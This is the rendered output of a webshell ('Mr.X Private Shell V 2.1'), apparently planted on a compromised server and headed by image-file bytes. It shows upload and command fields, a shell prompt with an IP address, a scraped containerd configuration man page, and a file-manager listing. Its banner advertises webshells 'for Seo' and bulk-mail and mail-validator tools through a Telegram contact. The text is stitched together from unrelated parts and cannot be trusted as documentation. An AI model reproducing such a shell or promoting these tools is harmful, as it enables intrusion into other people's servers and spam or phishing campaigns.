����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
.nh
.TH /etc/containerd/config.toml 5 04/05/2022
.SH NAME
.PP
containerd-config.toml - configuration file for containerd

.SH SYNOPSIS
.PP
The \fBconfig.toml\fP file is a configuration file for the containerd daemon. The
file must be placed at \fB/etc/containerd/config.toml\fP or specified with the
\fB--config\fP option of \fBcontainerd\fP to be used by the daemon. If the file
does not exist at the appropriate location or is not provided via the
\fB--config\fP option containerd uses its default configuration settings, which
can be displayed with the \fBcontainerd config(1)\fP command.

.SH DESCRIPTION
.PP
The TOML file used to configure the containerd daemon settings has a short
list of global settings followed by a series of sections for specific areas
of daemon configuration. There is also a section for \fBplugins\fP that allows
each containerd plugin to have an area for plugin-specific configuration and
settings.

.SH FORMAT
.TP
\fBversion\fP
The version field in the config file specifies the config’s version. If no
version number is specified inside the config file then it is assumed to be a
version 1 config and parsed as such. Please use version = 2 to enable version 2
config as version 1 has been deprecated.

.TP
\fBroot\fP
The root directory for containerd metadata. (Default: "/var/lib/containerd")

.TP
\fBstate\fP
The state directory for containerd (Default: "/run/containerd")

.TP
\fBplugin_dir\fP
The directory for dynamic plugins to be stored

.TP
\fB[grpc]\fP
Section for gRPC socket listener settings. Contains the following properties:

.RS
.IP \(bu 2
\fBaddress\fP (Default: "/run/containerd/containerd.sock")
.IP \(bu 2
\fBtcp_address\fP
.IP \(bu 2
\fBtcp_tls_cert\fP
.IP \(bu 2
\fBtcp_tls_key\fP
.IP \(bu 2
\fBuid\fP (Default: 0)
.IP \(bu 2
\fBgid\fP (Default: 0)
.IP \(bu 2
\fBmax_recv_message_size\fP
.IP \(bu 2
\fBmax_send_message_size\fP

.RE

.TP
\fB[ttrpc]\fP
Section for TTRPC settings. Contains properties:

.RS
.IP \(bu 2
\fBaddress\fP (Default: "")
.IP \(bu 2
\fBuid\fP (Default: 0)
.IP \(bu 2
\fBgid\fP (Default: 0)

.RE

.TP
\fB[debug]\fP
Section to enable and configure a debug socket listener. Contains four properties:

.RS
.IP \(bu 2
\fBaddress\fP (Default: "/run/containerd/debug.sock")
.IP \(bu 2
\fBuid\fP (Default: 0)
.IP \(bu 2
\fBgid\fP (Default: 0)
.IP \(bu 2
\fBlevel\fP (Default: "info") sets the debug log level. Supported levels are:
"trace", "debug", "info", "warn", "error", "fatal", "panic"
.IP \(bu 2
\fBformat\fP (Default: "text") sets log format. Supported formats are "text" and "json"

.RE

.TP
\fB[metrics]\fP
Section to enable and configure a metrics listener. Contains two properties:

.RS
.IP \(bu 2
\fBaddress\fP (Default: "") Metrics endpoint does not listen by default
.IP \(bu 2
\fBgrpc_histogram\fP (Default: false) Turn on or off gRPC histogram metrics

.RE

.TP
\fBdisabled_plugins\fP
Disabled plugins are IDs of plugins to disable. Disabled plugins won't be
initialized and started.

.TP
\fBrequired_plugins\fP
Required plugins are IDs of required plugins. Containerd exits if any
required plugin doesn't exist or fails to be initialized or started.

.TP
\fB[plugins]\fP
The plugins section contains configuration options exposed from installed plugins.
The following plugins are enabled by default and their settings are shown below.
Plugins that are not enabled by default will provide their own configuration values
documentation.

.RS
.IP \(bu 2
\fB[plugins."io.containerd.monitor.v1.cgroups"]\fP has one option \fBno_prometheus\fP (Default: \fBfalse\fP)
.IP \(bu 2
\fB[plugins."io.containerd.service.v1.diff-service"]\fP has one option \fBdefault\fP, a list by default set to \fB["walking"]\fP
.IP \(bu 2
\fB[plugins."io.containerd.gc.v1.scheduler"]\fP has several options that perform advanced tuning for the scheduler:
.RS
.IP \(bu 2
\fBpause_threshold\fP is the maximum amount of time GC should be scheduled (Default: \fB0.02\fP),
.IP \(bu 2
\fBdeletion_threshold\fP guarantees GC is scheduled after n number of deletions (Default: \fB0\fP [not triggered]),
.IP \(bu 2
\fBmutation_threshold\fP guarantees GC is scheduled after n number of database mutations (Default: \fB100\fP),
.IP \(bu 2
\fBschedule_delay\fP defines the delay after trigger event before scheduling a GC (Default \fB"0ms"\fP [immediate]),
.IP \(bu 2
\fBstartup_delay\fP defines the delay after startup before scheduling a GC (Default \fB"100ms"\fP)

.RE

.IP \(bu 2
\fB[plugins."io.containerd.runtime.v2.task"]\fP specifies options for configuring the runtime shim:
.RS
.IP \(bu 2
\fBplatforms\fP specifies the list of supported platforms
.IP \(bu 2
\fBsched_core\fP Core scheduling is a feature that allows only trusted tasks
to run concurrently on cpus sharing compute resources (eg: hyperthreads on
a core). (Default: \fBfalse\fP)

.RE

.IP \(bu 2
\fB[plugins."io.containerd.service.v1.tasks-service"]\fP has performance options:
.RS
.IP \(bu 2
\fBblockio_config_file\fP (Linux only) specifies path to blockio class definitions
(Default: \fB""\fP). Controls I/O scheduler priority and bandwidth throttling.
See blockio configuration
\[la]https://github.com/intel/goresctrl/blob/main/doc/blockio.md#configuration\[ra]
for details of the file format.
.IP \(bu 2
\fBrdt_config_file\fP (Linux only) specifies path to a configuration used for configuring
RDT (Default: \fB""\fP). Enables support for Intel RDT, a technology
for cache and memory bandwidth management.
See RDT configuration
\[la]https://github.com/intel/goresctrl/blob/main/doc/rdt.md#configuration\[ra]
for details of the file format.

.RE

.IP \(bu 2
\fB[plugins."io.containerd.grpc.v1.cri".containerd]\fP contains options for the CRI plugin, and child nodes for CRI options:
.RS
.IP \(bu 2
\fBdefault_runtime_name\fP (Default: \fB"runc"\fP) specifies the default runtime name

.RE

.IP \(bu 2
\fB[plugins."io.containerd.grpc.v1.cri".containerd.runtimes]\fP one or more container runtimes, each with a unique name
.IP \(bu 2
\fB[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.]\fP a runtime named \fB\fC<runtime>\fR
.IP \(bu 2
\fB[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.\&.options]\fP options for the named \fB\fC<runtime>\fR, most important:
.RS
.IP \(bu 2
\fBBinaryName\fP specifies the path to the actual runtime to be invoked by the shim, e.g. \fB\fC"/usr/bin/runc"\fR

.RE


.RE

.TP
\fBoom_score\fP
The out of memory (OOM) score applied to the containerd daemon process (Default: 0)

.TP
\fB[cgroup]\fP
Section for Linux cgroup specific settings

.RS
.IP \(bu 2
\fBpath\fP (Default: "") Specify a custom cgroup path for created containers

.RE

.TP
\fB[proxy_plugins]\fP
Proxy plugins configures plugins which are communicated to over gRPC

.RS
.IP \(bu 2
\fBtype\fP (Default: "")
.IP \(bu 2
\fBaddress\fP (Default: "")

.RE

.TP
\fBtimeouts\fP
Timeouts specified as a duration

.TP
\fBimports\fP
Imports is a list of additional configuration files to include.
This allows to split the main configuration file and keep some sections
separately (for example vendors may keep a custom runtime configuration in a
separate file without modifying the main \fB\fCconfig.toml\fR).
Imported files will overwrite simple fields like \fB\fCint\fR or
\fB\fCstring\fR (if not empty) and will append \fB\fCarray\fR and \fB\fCmap\fR fields.
Imported files are also versioned, and the version can't be higher than
the main config.

.PP
\fBstream_processors\fP

.RS
.IP \(bu 2
\fBaccepts\fP (Default: "[]") Accepts specific media-types
.IP \(bu 2
\fBreturns\fP (Default: "") Returns the media-type
.IP \(bu 2
\fBpath\fP (Default: "") Path or name of the binary
.IP \(bu 2
\fBargs\fP (Default: "[]") Args to the binary

.RE

.SH EXAMPLES
.SS Complete Configuration
.PP
The following is a complete \fBconfig.toml\fP default configuration example:

.PP
.RS

.nf
version = 2

root = "/var/lib/containerd"
state = "/run/containerd"
oom_score = 0
imports = ["/etc/containerd/runtime_*.toml", "./debug.toml"]

[grpc]
  address = "/run/containerd/containerd.sock"
  uid = 0
  gid = 0

[debug]
  address = "/run/containerd/debug.sock"
  uid = 0
  gid = 0
  level = "info"

[metrics]
  address = ""
  grpc_histogram = false

[cgroup]
  path = ""

[plugins]
  [plugins."io.containerd.monitor.v1.cgroups"]
    no_prometheus = false
  [plugins."io.containerd.service.v1.diff-service"]
    default = ["walking"]
  [plugins."io.containerd.gc.v1.scheduler"]
    pause_threshold = 0.02
    deletion_threshold = 0
    mutation_threshold = 100
    schedule_delay = 0
    startup_delay = "100ms"
  [plugins."io.containerd.runtime.v2.task"]
    platforms = ["linux/amd64"]
    sched_core = true
  [plugins."io.containerd.service.v1.tasks-service"]
    blockio_config_file = ""
    rdt_config_file = ""

.fi
.RE

.SS Multiple Runtimes
.PP
The following is an example partial configuration with two runtimes:

.PP
.RS

.nf
[plugins]

  [plugins."io.containerd.grpc.v1.cri"]

    [plugins."io.containerd.grpc.v1.cri".containerd]
      default_runtime_name = "runc"

      [plugins."io.containerd.grpc.v1.cri".containerd.runtimes]
        [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
          privileged_without_host_devices = false
          runtime_type = "io.containerd.runc.v2"

          [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
            BinaryName = "/usr/bin/runc"

        [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.other]
          privileged_without_host_devices = false
          runtime_type = "io.containerd.runc.v2"

          [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.other.options]
            BinaryName = "/usr/bin/path-to-runtime"

.fi
.RE

.PP
The above creates two named runtime configurations - named \fB\fCrunc\fR and \fB\fCother\fR - and sets the default runtime to \fB\fCrunc\fR\&.
The above are used \fIsolely\fP for runtimes invoked via CRI. To use the non-default "other" runtime in this example,
a spec will include the runtime handler named "other" to specify the desire to use the named runtime config.

.PP
The CRI specification includes a \fB\fCruntime_handler\fR field
\[la]https://github.com/kubernetes/cri-api/blob/de5f1318aede866435308f39cb432618a15f104e/pkg/apis/runtime/v1/api.proto#L476\[ra], which will reference the named runtime.

.PP
It is important to note the naming convention. Runtimes are under \fB\fC[plugins."io.containerd.grpc.v1.cri".containerd.runtimes]\fR,
with each runtime given a unique name, e.g. \fB\fC[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]\fR\&.
In addition, each runtime can have shim-specific options under \fB\fC[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.<runtime>.options]\fR,
for example, \fB\fC[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]\fR\&.

.PP
The \fB\fCio.containerd.runc.v2\fR runtime is used to run OCI-compatible runtimes on Linux, such as runc.  In the example above, the \fB\fCruntime_type\fR
field specifies the shim to use (\fB\fCio.containerd.runc.v2\fR) while the \fB\fCBinaryName\fR field is a shim-specific option which specifies the path to the
OCI runtime.

.PP
For the example configuration named "runc", the shim will launch \fB\fC/usr/bin/runc\fR as the OCI runtime.  For the example configuration named
"other", the shim will launch \fB\fC/usr/bin/path-to-runtime\fR instead.

.SH BUGS
.PP
Please file any specific issues that you encounter at
https://github.com/containerd/containerd.

.SH AUTHOR
.PP
Phil Estes estesp@gmail.com
\[la]mailto:estesp@gmail.com\[ra]

.SH SEE ALSO
.PP
ctr(8), containerd-config(8), containerd(8)

Filemanager

Name Type Size Permission Actions
.k5identity.5.gz File 42 B 0644
.k5login.5.gz File 39 B 0644
Compose.5.gz File 2.53 KB 0644
Dockerfile.5.gz File 6.33 KB 0644
FontDatabase.5.gz File 1.05 KB 0644
NetworkManager.conf.5.gz File 18.31 KB 0644
XCompose.5.gz File 39 B 0644
access.conf.5.gz File 2.71 KB 0644
acct.5.gz File 1.89 KB 0644
acl.5.gz File 4.98 KB 0644
adjtime_config.5.gz File 1.44 KB 0644
anacrontab.5.gz File 1.79 KB 0644
at.allow.5.gz File 433 B 0644
at.deny.5.gz File 433 B 0644
auditd-plugins.5.gz File 2.18 KB 0644
auditd.conf.5.gz File 6.68 KB 0644
ausearch-expression.5.gz File 2 KB 0644
authselect-profiles.5.gz File 3.07 KB 0644
binfmt.d.5.gz File 1.58 KB 0644
cert9.db.5.gz File 847 B 0644
charmap.5.gz File 1.08 KB 0644
chrony.conf.5.gz File 45.06 KB 0644
cockpit.conf.5.gz File 3.44 KB 0644
collectd-exec.5.gz File 6.15 KB 0644
collectd-threshold.5.gz File 4.58 KB 0644
collectd-unixsock.5.gz File 5.55 KB 0644
collectd.conf.5.gz File 137.17 KB 0644
config-util.5.gz File 480 B 0644
console.apps.5.gz File 439 B 0644
console.handlers.5.gz File 850 B 0644
console.perms.5.gz File 1005 B 0644
containerd-config.toml.5 File 11.31 KB 0644
core.5.gz File 7.26 KB 0644
coredump.conf.5.gz File 2.27 KB 0644
coredump.conf.d.5.gz File 45 B 0644
cpio.5.gz File 5.04 KB 0644
crontab.5.gz File 5.36 KB 0644
crypt.5.gz File 4.38 KB 0644
crypttab.5.gz File 10.61 KB 0644
customizable_types.5.gz File 795 B 0644
default_contexts.5.gz File 819 B 0644
default_type.5.gz File 590 B 0644
depmod.d.5.gz File 1.72 KB 0644
dhclient.conf.5.gz File 10.78 KB 0644
dhclient.leases.5.gz File 1.07 KB 0644
dhcp-eval.5.gz File 6.71 KB 0644
dhcp-options.5.gz File 22.24 KB 0644
dir_colors.5.gz File 3.69 KB 0644
dnf-transaction-json.5.gz File 1.33 KB 0644
dnf.conf.5.gz File 11.98 KB 0644
dnssec-trust-anchors.d.5.gz File 2.75 KB 0644
docker-config-json.5.gz File 1.28 KB 0644
dovecot.conf.5.gz File 393 B 0644
dpkg.cfg.5.gz File 1.33 KB 0644
dracut.conf.5.gz File 4.81 KB 0644
e2fsck.conf.5.gz File 5.66 KB 0644
editrc.5.gz File 3.04 KB 0644
elf.5.gz File 14.74 KB 0644
environment.5.gz File 44 B 0644
environment.d.5.gz File 2.36 KB 0644
ethers.5.gz File 548 B 0644
exports.5.gz File 8.91 KB 0644
ext2.5.gz File 10.78 KB 0644
ext3.5.gz File 10.78 KB 0644
ext4.5.gz File 10.78 KB 0644
extension-release.5.gz File 42 B 0644
faillock.conf.5.gz File 2.03 KB 0644
failsafe_context.5.gz File 790 B 0644
file_contexts.5.gz File 44 B 0644
file_contexts.homedirs.5.gz File 44 B 0644
file_contexts.local.5.gz File 44 B 0644
file_contexts.subs.5.gz File 44 B 0644
file_contexts.subs_dist.5.gz File 44 B 0644
filesystems.5.gz File 2.43 KB 0644
fingerprint-auth.5.gz File 645 B 0644
fips_config.5ossl.gz File 2.32 KB 0644
firewalld.conf.5.gz File 2.78 KB 0644
firewalld.dbus.5.gz File 18.46 KB 0644
firewalld.direct.5.gz File 3.52 KB 0644
firewalld.helper.5.gz File 1.58 KB 0644
firewalld.icmptype.5.gz File 1.37 KB 0644
firewalld.ipset.5.gz File 1.53 KB 0644
firewalld.lockdown-whitelist.5.gz File 1.68 KB 0644
firewalld.policies.5.gz File 2.12 KB 0644
firewalld.policy.5.gz File 2.9 KB 0644
firewalld.richlanguage.5.gz File 5.07 KB 0644
firewalld.service.5.gz File 2.15 KB 0644
firewalld.zone.5.gz File 3.38 KB 0644
firewalld.zones.5.gz File 2.64 KB 0644
flatpak-flatpakref.5.gz File 2.38 KB 0644
flatpak-flatpakrepo.5.gz File 2.39 KB 0644
flatpak-installation.5.gz File 1.07 KB 0644
flatpak-metadata.5.gz File 7.44 KB 0644
flatpak-remote.5.gz File 1.95 KB 0644
fonts-conf.5.gz File 11.12 KB 0644
freetds.conf.5.gz File 2.39 KB 0644
fs.5.gz File 43 B 0644
fstab.5.gz File 2.99 KB 0644
ftpusers.5.gz File 750 B 0644
gai.conf.5.gz File 1.32 KB 0644
geoclue.5.gz File 1.35 KB 0644
group.5.gz File 644 B 0644
group.conf.5.gz File 1.95 KB 0644
gshadow.5.gz File 1.23 KB 0644
gssproxy.conf.5.gz File 3.79 KB 0644
hesiod.conf.5.gz File 1.38 KB 0644
host.conf.5.gz File 1.96 KB 0644
hostname.5.gz File 1.58 KB 0644
hosts.5.gz File 1.85 KB 0644
hosts.equiv.5.gz File 1.62 KB 0644
idmapd.conf.5.gz File 4.16 KB 0644
info.5.gz File 750 B 0644
initrd-release.5.gz File 42 B 0644
integritytab.5.gz File 1.83 KB 0644
intro.5.gz File 539 B 0644
issue.5.gz File 508 B 0644
journald.conf.5.gz File 7.09 KB 0644
journald.conf.d.5.gz File 45 B 0644
journald@.conf.5.gz File 45 B 0644
k5identity.5.gz File 1.18 KB 0644
k5login.5.gz File 1.15 KB 0644
kdump.conf.5.gz File 4.77 KB 0644
key.dns_resolver.conf.5.gz File 1.01 KB 0644
key4.db.5.gz File 850 B 0644
keymaps.5.gz File 4.81 KB 0644
krb5.conf.5.gz File 14.58 KB 0644
ldap.conf.5.gz File 6.08 KB 0644
ldif.5.gz File 2.49 KB 0644
ledmon.conf.5.gz File 3.74 KB 0644
libaudit.conf.5.gz File 553 B 0644
libnftables-json.5.gz File 9.61 KB 0644
libuser.conf.5.gz File 3.7 KB 0644
limits.conf.5.gz File 2.88 KB 0644
lmhosts.5.gz File 1.51 KB 0644
locale.5.gz File 7.11 KB 0644
locale.conf.5.gz File 1.33 KB 0644
localtime.5.gz File 932 B 0644
login.defs.5.gz File 7.19 KB 0644
logind.conf.5.gz File 5 KB 0644
logind.conf.d.5.gz File 43 B 0644
logrotate.conf.5.gz File 41 B 0644
lsmd.conf.5.gz File 829 B 0644
lvm.conf.5.gz File 2.98 KB 0444
machine-id.5.gz File 3.24 KB 0644
machine-info.5.gz File 1.92 KB 0644
magic.5.gz File 7.58 KB 0644
mailcap.5.gz File 3.8 KB 0644
makedumpfile.conf.5.gz File 3.91 KB 0644
manpath.5.gz File 2.12 KB 0644
mcelog.triggers.5.gz File 2.05 KB 0644
mdadm.conf.5.gz File 6.98 KB 0644
media.5.gz File 45 B 0644
mke2fs.conf.5.gz File 5.47 KB 0644
mlocate.db.5.gz File 1.59 KB 0644
modprobe.conf.5.gz File 3.05 KB 0644
modprobe.d.5.gz File 3.05 KB 0644
modules-load.d.5.gz File 1.54 KB 0644
modules.dep.5.gz File 1.02 KB 0644
modules.dep.bin.5.gz File 43 B 0644
moduli.5.gz File 1.76 KB 0644
motd.5.gz File 525 B 0644
mtree.5.gz File 3.19 KB 0644
named.conf.5.gz File 5.72 KB 0644
namespace.conf.5.gz File 2.81 KB 0644
nanorc.5.gz File 11.61 KB 0644
netrc.5.gz File 2.02 KB 0644
networks.5.gz File 863 B 0644
nfs.5.gz File 19.52 KB 0644
nfs.conf.5.gz File 2.37 KB 0644
nfsmount.conf.5.gz File 1.44 KB 0644
nfsrahead.5.gz File 684 B 0644
nm-settings-dbus.5.gz File 40.94 KB 0644
nm-settings-ifcfg-rh.5.gz File 16.16 KB 0644
nm-settings-keyfile.5.gz File 4.91 KB 0644
nm-settings-nmcli.5.gz File 47.28 KB 0644
nm-settings.5.gz File 47.28 KB 0644
nm-system-settings.conf.5.gz File 18.31 KB 0644
nologin.5.gz File 520 B 0644
nscd.conf.5.gz File 3.2 KB 0644
nss.5.gz File 1.37 KB 0644
nsswitch.conf.5.gz File 3.48 KB 0644
odbc.ini.5.gz File 1.27 KB 0644
odbcinst.ini.5.gz File 1.38 KB 0644
openssl.cnf.5.gz File 9.46 KB 0644
org.freedesktop.LogControl1.5.gz File 1.5 KB 0644
org.freedesktop.hostname1.5.gz File 4.92 KB 0644
org.freedesktop.locale1.5.gz File 2.04 KB 0644
org.freedesktop.login1.5.gz File 10.72 KB 0644
org.freedesktop.systemd1.5.gz File 32.87 KB 0644
org.freedesktop.timedate1.5.gz File 2.42 KB 0644
os-release.5.gz File 7.57 KB 0644
pam.conf.5.gz File 4.64 KB 0644
pam.d.5.gz File 40 B 0644
pam_env.conf.5.gz File 1.78 KB 0644
papersize.5.gz File 890 B 0644
passwd.5.gz File 2.12 KB 0644
password-auth.5.gz File 645 B 0644
pc.5.gz File 2.11 KB 0644
pipewire-pulse.conf.5.gz File 658 B 0644
pipewire.conf.5.gz File 1.48 KB 0644
pkcs11.conf.5.gz File 2.95 KB 0644
pkcs11.txt.5.gz File 949 B 0644
pkgconf-personality.5.gz File 1.36 KB 0644
png.5.gz File 1.12 KB 0644
postlogin.5.gz File 593 B 0644
proc.5.gz File 60.45 KB 0644
procfs.5.gz File 36 B 0644
procmailex.5.gz File 6.73 KB 0644
procmailrc.5.gz File 11.13 KB 0644
procmailsc.5.gz File 3.48 KB 0644
projects.5.gz File 371 B 0644
projid.5.gz File 376 B 0644
protocols.5.gz File 957 B 0644
pstore.conf.5.gz File 1.75 KB 0644
pstore.conf.d.5.gz File 43 B 0644
pwhistory.conf.5.gz File 1.19 KB 0644
pwquality.conf.5.gz File 2.97 KB 0644
quantize.5.gz File 4.31 KB 0644
rcsfile.5.gz File 3.69 KB 0644
realmd.conf.5.gz File 4.62 KB 0644
removable_context.5.gz File 562 B 0644
repart.d.5.gz File 8.83 KB 0644
repertoiremap.5.gz File 786 B 0644
request-key.conf.5.gz File 1.96 KB 0644
resolv.conf.5.gz File 4.9 KB 0644
resolver.5.gz File 43 B 0644
rndc.conf.5.gz File 2.18 KB 0644
rpc.5.gz File 969 B 0644
rsyncd.conf.5.gz File 19.31 KB 0644
rsyslog.conf.5.gz File 11.34 KB 0644
scr_dump.5.gz File 5.25 KB 0644
secolor.conf.5.gz File 1.12 KB 0644
securetty.5.gz File 564 B 0644
securetty_types.5.gz File 626 B 0644
selabel_db.5.gz File 2.8 KB 0644
selabel_file.5.gz File 3.16 KB 0644
selabel_media.5.gz File 1.4 KB 0644
selabel_x.5.gz File 2.43 KB 0644
selinux_config.5.gz File 1.78 KB 0644
semanage.conf.5.gz File 2.05 KB 0644
sepermit.conf.5.gz File 1.16 KB 0644
sepgsql_contexts.5.gz File 42 B 0644
service_seusers.5.gz File 800 B 0644
services.5.gz File 2.4 KB 0644
sestatus.conf.5.gz File 766 B 0644
seusers.5.gz File 773 B 0644
shadow.5.gz File 1.85 KB 0644
shells.5.gz File 609 B 0644
slabinfo.5.gz File 2.5 KB 0644
sleep.conf.d.5.gz File 50 B 0644
smartcard-auth.5.gz File 645 B 0644
smartd.conf.5.gz File 20.08 KB 0644
smb.conf.5.gz File 127.56 KB 0644
smbpasswd.5.gz File 2.62 KB 0644
snmp_config.5.gz File 2.6 KB 0644
snmpd.conf.5.gz File 27.16 KB 0644
snmpd.examples.5.gz File 7.2 KB 0644
snmpd.internal.5.gz File 1.43 KB 0644
snmptrapd.conf.5.gz File 4.84 KB 0644
sos.conf.5.gz File 1.89 KB 0644
ssh_config.5.gz File 18.22 KB 0644
sshd_config.5.gz File 15.86 KB 0644
sss-certmap.5.gz File 5.69 KB 0644
sss_rpcidmapd.5.gz File 1.24 KB 0644
sssd-ad.5.gz File 15.11 KB 0644
sssd-files.5.gz File 2 KB 0644
sssd-ipa.5.gz File 7.94 KB 0644
sssd-krb5.5.gz File 6.18 KB 0644
sssd-ldap-attributes.5.gz File 4.25 KB 0644
sssd-ldap.5.gz File 16.07 KB 0644
sssd-session-recording.5.gz File 1.75 KB 0644
sssd-simple.5.gz File 2.01 KB 0644
sssd-sudo.5.gz File 3.03 KB 0644
sssd-systemtap.5.gz File 1.98 KB 0644
sssd.conf.5.gz File 26.95 KB 0644
subgid.5.gz File 1.34 KB 0644
subuid.5.gz File 1.33 KB 0644
sudo-ldap.conf.5.gz File 44 B 0644
sudo.conf.5.gz File 7.25 KB 0644
sudoers.5.gz File 42.66 KB 0644
sudoers.ldap.5.gz File 12.89 KB 0644
sudoers_timestamp.5.gz File 3.65 KB 0644
sysctl.conf.5.gz File 1.08 KB 0644
sysctl.d.5.gz File 3.01 KB 0644
sysfs.5.gz File 2.46 KB 0644
sysstat.5.gz File 2.35 KB 0644
system-auth.5.gz File 645 B 0644
system.conf.d.5.gz File 46 B 0644
systemd-sleep.conf.5.gz File 2.61 KB 0644
systemd-system.conf.5.gz File 8.14 KB 0644
systemd-user-runtime-dir.5.gz File 43 B 0644
systemd-user.conf.5.gz File 46 B 0644
systemd.automount.5.gz File 2.24 KB 0644
systemd.device.5.gz File 2.23 KB 0644
systemd.dnssd.5.gz File 2.88 KB 0644
systemd.exec.5.gz File 48.72 KB 0644
systemd.kill.5.gz File 2.23 KB 0644
systemd.link.5.gz File 9.74 KB 0644
systemd.mount.5.gz File 5.72 KB 0644
systemd.nspawn.5.gz File 4.7 KB 0644
systemd.path.5.gz File 2.87 KB 0644
systemd.preset.5.gz File 3.12 KB 0644
systemd.resource-control.5.gz File 12.63 KB 0644
systemd.scope.5.gz File 2.6 KB 0644
systemd.service.5.gz File 18.4 KB 0644
systemd.slice.5.gz File 1.64 KB 0644
systemd.socket.5.gz File 9.49 KB 0644
systemd.swap.5.gz File 2.82 KB 0644
systemd.target.5.gz File 1.78 KB 0644
systemd.timer.5.gz File 5.02 KB 0644
systemd.unit.5.gz File 26.37 KB 0644
sysupdate.d.5.gz File 9.72 KB 0644
sysusers.d.5.gz File 3.97 KB 0644
tar.5.gz File 10.79 KB 0644
teamd.conf.5.gz File 3.6 KB 0644
term.5.gz File 5.8 KB 0644
termcap.5.gz File 5.15 KB 0644
terminal-colors.d.5.gz File 2.28 KB 0644
terminfo.5.gz File 36.33 KB 0644
time.conf.5.gz File 1.97 KB 0644
tmpfiles.d.5.gz File 10.75 KB 0644
tmpfs.5.gz File 2.46 KB 0644
ttytype.5.gz File 797 B 0644
tuned-main.conf.5.gz File 1.64 KB 0644
tuned.conf.5.gz File 1.35 KB 0644
types.db.5.gz File 3.14 KB 0644
tzfile.5.gz File 6.51 KB 0644
udev.conf.5.gz File 1.21 KB 0644
updatedb.conf.5.gz File 1.69 KB 0644
user-runtime-dir@.service.5.gz File 43 B 0644
user.conf.d.5.gz File 46 B 0644
user@.service.5.gz File 2.41 KB 0644
user_caps.5.gz File 5.96 KB 0644
user_contexts.5.gz File 939 B 0644
utmp.5.gz File 4.21 KB 0644
utmpx.5.gz File 36 B 0644
variables.5.gz File 3.02 KB 0644
vconsole.conf.5.gz File 1.36 KB 0644
veritytab.5.gz File 2.52 KB 0644
vimrc.5.gz File 35 B 0644
virc.5.gz File 34 B 0644
virtual_domain_context.5.gz File 620 B 0644
virtual_image_context.5.gz File 615 B 0644
wtmp.5.gz File 36 B 0644
x509v3_config.5ossl.gz File 8.65 KB 0644
x_contexts.5.gz File 41 B 0644
xfs.5.gz File 5 KB 0644
yum.conf.5.gz File 11.99 KB 0644